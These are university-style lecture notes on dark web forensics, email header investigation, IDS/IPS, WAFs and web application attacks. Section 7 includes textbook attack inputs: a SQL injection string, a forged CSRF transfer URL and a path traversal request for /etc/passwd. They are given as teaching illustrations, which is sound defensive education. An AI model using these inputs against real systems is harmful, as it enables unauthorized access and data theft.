Unit 5 - Notes

INT250

Unit 5: Dark Web Forensics, Investigating Email Crimes and Web Attacks

1. Understanding the Dark Web

The internet is conceptually divided into three layers, often visualized as an iceberg:

  1. Surface Web: The portion of the internet indexed by standard search engines (Google, Bing). It constitutes only about 4-10% of the web.
  2. Deep Web: Content not indexed by search engines. This includes medical records, subscription-based content, academic databases, and government reports. It is accessible via standard browsers but requires login credentials or direct links.
  3. Dark Web: A subset of the Deep Web that is intentionally hidden and requires specific software, configurations, or authorization to access.

1.1 Architecture of the Dark Web

The most common Dark Web network is Tor (The Onion Router).

  • Onion Routing: Traffic is wrapped in multiple layers of encryption (like an onion). Data passes through a series of network nodes (relays).
  • Entry Guard: The entry point into the Tor network; knows the user's IP but not the destination.
  • Middle Relay: Passes encrypted data from the guard to the exit; knows neither the source nor the content.
  • Exit Relay: Decrypts the final layer and sends data to the destination; knows the destination but not the source IP.

Other Dark Nets:

  • I2P (Invisible Internet Project): Focuses on hidden services and peer-to-peer communication.
  • Freenet: A decentralized data storage network.

1.2 Dark Web Forensics

Dark Web Forensics involves the identification, preservation, and analysis of data related to criminal activities on dark networks (e.g., drug trafficking, weapons sales, illicit pornography).

Key Forensic Artifacts on a Suspect's Machine:

  • Tor Browser Artifacts: Tor is based on Firefox, so Firefox-related artifacts apply (places.sqlite, cookies.sqlite). However, Tor runs in "Private Browsing" mode by default, minimizing disk writes.
  • RAM Analysis: Because Tor minimizes disk artifacts, capturing live memory (RAM) is crucial to recovering browsing history, encryption keys, and active connections.
  • Prefetch Files: Windows .pf files can prove that the Tor Browser executable was run.
  • Registry Keys: UserAssist keys can show execution history of Tor software.

2. Understanding Email Basics

Email is one of the most common vectors for cybercrime. Understanding its underlying architecture is essential for tracing sources.

2.1 Email Architecture

  • MUA (Mail User Agent): The email client used by the end-user (e.g., Outlook, Thunderbird, Webmail).
  • MSA (Mail Submission Agent): Receives mail from the MUA and checks for errors before passing it to the MTA.
  • MTA (Mail Transfer Agent): The server software that transfers emails between computers (e.g., Postfix, Sendmail). It uses DNS to find the recipient's mail server.
  • MDA (Mail Delivery Agent): Receives the mail from the MTA and stores it in the user's mailbox.
  • MRA (Mail Retrieval Agent): Fetches mail from the remote server to the MUA (via POP/IMAP).

2.2 Protocols

  • SMTP (Simple Mail Transfer Protocol): Port 25/587. Used for sending email from client to server and between servers.
  • POP3 (Post Office Protocol v3): Port 110/995. Used for retrieving email. It typically downloads email to the local device and deletes it from the server.
  • IMAP (Internet Message Access Protocol): Port 143/993. Used for retrieving email. It synchronizes email across multiple devices, leaving the mail on the server.

2.3 Structure of an Email

  1. Header: Contains metadata (Sender IP, Route, Timestamp, Message-ID). This is the most critical part for forensics.
  2. Body: The actual content (Text/HTML).
  3. Attachments: Files encoded (usually Base64) within the message.

3. Email Crime Investigation and its Steps

Email crimes include Phishing, BEC (Business Email Compromise), Spamming, Cyberstalking, and Malware distribution.

3.1 Key Investigation Steps

Step 1: Acquisition and Preservation

  • Secure the victim's device or access to the email account.
  • Do not simply "forward" the suspicious email to the investigator, as this alters the header information.
  • Export the email as an .eml or .msg file to preserve original headers and attachments.

Step 2: Email Header Analysis

The header is the "digital fingerprint" of the email.

  • Message-ID: A unique string generated by the sending server.
  • Received: Read from bottom to top. It traces the path the email took from sender to recipient.
    • Bottom-most "Received": Usually indicates the originating IP address.
  • Return-Path: The address where bounce messages are sent.
  • X-Mailer: Identifies the software used to send the mail (can indicate automated spam tools).

Step 3: Validation (Anti-Spoofing Checks)

Investigators check three specific records in the header to verify if the sender is legitimate or spoofed:

  1. SPF (Sender Policy Framework): Verifies if the sending IP is authorized by the domain administrators.
  2. DKIM (DomainKeys Identified Mail): A cryptographic signature verifying that the email was not altered in transit.
  3. DMARC: Specifies what to do if SPF or DKIM fails (e.g., reject, quarantine).

Step 4: Tracing the IP Address

  • Extract the originating IP from the "Received" header.
  • Use Whois lookup tools to identify the ISP (Internet Service Provider) owning that IP.
  • Use GeoIP tools to locate the physical region of the sender.

Step 5: Server Log Analysis

  • If the investigator has access to the server, they analyze SMTP logs to correlate the Message-ID with specific user login times and IP addresses.

4. Intrusion Detection System (IDS)

An IDS is a monitoring tool that acts like a burglar alarm. It inspects network traffic or system logs for suspicious activity and issues alerts.

4.1 Classifications of IDS

  1. NIDS (Network Intrusion Detection System):
    • Placed at strategic points within the network (e.g., behind the firewall).
    • Monitors traffic (packets) for the whole subnet.
    • Example: Snort, Zeek.
  2. HIDS (Host Intrusion Detection System):
    • Installed on individual hosts (servers/workstations).
    • Monitors file integrity, system logs, and configuration changes.
    • Example: OSSEC, Wazuh.

4.2 Detection Methodologies

  • Signature-Based (Misuse Detection): Compares traffic against a database of known attack signatures.
    • Pros: High accuracy for known attacks.
    • Cons: Cannot detect zero-day (new) attacks.
  • Anomaly-Based (Behavioral): Establishes a "baseline" of normal traffic. Anything deviating significantly from the baseline is flagged.
    • Pros: Can detect new/unknown attacks.
    • Cons: Higher rate of False Positives.

5. Intrusion Prevention System (IPS)

While an IDS is passive (alerts only), an IPS is active. It sits in-line with the traffic flow and can stop an attack in real-time.

5.1 Functionality

  • Prevention: If an IPS detects a malicious packet, it can drop the packet, reset the connection, or block the IP address automatically.
  • Placement: Must be placed in-line (between the outside world and the internal network) to effectively block traffic.

5.2 Differences: IDS vs. IPS

Feature IDS (Intrusion Detection System) IPS (Intrusion Prevention System)
Action Passive (Monitoring & Alerting) Active (Control & Blocking)
Placement Promiscuous mode (copy of traffic) In-line (traffic flows through it)
Impact on Network No latency added Can introduce latency
Risk No risk of blocking legitimate traffic Risk of blocking legitimate traffic (False Positive)

6. Web Application Firewall (WAF)

Traditional network firewalls (Packet Filters) operate at Layer 3 (Network) and Layer 4 (Transport). They cannot inspect the content of a web request. A WAF operates at Layer 7 (Application Layer).

6.1 Role of WAF

  • It serves as a shield between a web application and the Internet.
  • It protects against specific web attacks such as SQL injection, Cross-Site Scripting (XSS), and file inclusion.
  • It inspects HTTP/HTTPS traffic specifically.

6.2 Deployment Models

  • Network-based WAF: Hardware appliance installed locally.
  • Host-based WAF: Software installed on the web server itself (e.g., ModSecurity).
  • Cloud-based WAF: Traffic is redirected through a third-party cloud provider (e.g., Cloudflare, AWS WAF) before reaching the server.

7. Attacks on Web Applications

Web applications are high-value targets because they are accessible 24/7 and often connect to sensitive databases.

7.1 SQL Injection (SQLi)

  • Concept: The attacker injects malicious SQL commands into input fields (like login forms or search bars) to manipulate the backend database.
  • Goal: Bypass authentication, access sensitive data, modify data, or delete tables.
  • Example: Entering ' OR '1'='1 in a password field to trick the database into evaluating the condition as true.

7.2 Cross-Site Scripting (XSS)

  • Concept: The attacker injects malicious client-side scripts (usually JavaScript) into web pages viewed by other users.
  • Types:
    • Stored XSS: The malicious script is saved on the server (e.g., in a forum post).
    • Reflected XSS: The script is embedded in a link; it executes when the victim clicks the link.
  • Goal: Steal session cookies (Session Hijacking), redirect users to phishing sites.

7.3 Cross-Site Request Forgery (CSRF)

  • Concept: An attacker tricks an authenticated user into executing unwanted actions on a web application in which they are currently logged in.
  • Example: A user is logged into their bank. They click a malicious link in a separate tab that secretly sends a request to bank.com/transfer?amount=1000&to=attacker. Because the user is logged in, the browser sends the valid session cookie, and the bank processes the transfer.

7.4 Denial of Service (DoS) and DDoS

  • DoS: Flooding a server with traffic to exhaust resources (CPU, RAM, Bandwidth) so legitimate users cannot access it.
  • DDoS (Distributed DoS): Using a botnet (network of infected zombie computers) to launch a DoS attack from thousands of IPs simultaneously.

7.5 Directory Traversal (Path Traversal)

  • Concept: Manipulating variables that reference files with "dot-dot-slash" (../) sequences.
  • Goal: To access files and directories that are stored outside the web root folder.
  • Example: Accessing http://website.com/../../../../etc/passwd to read Linux system user files.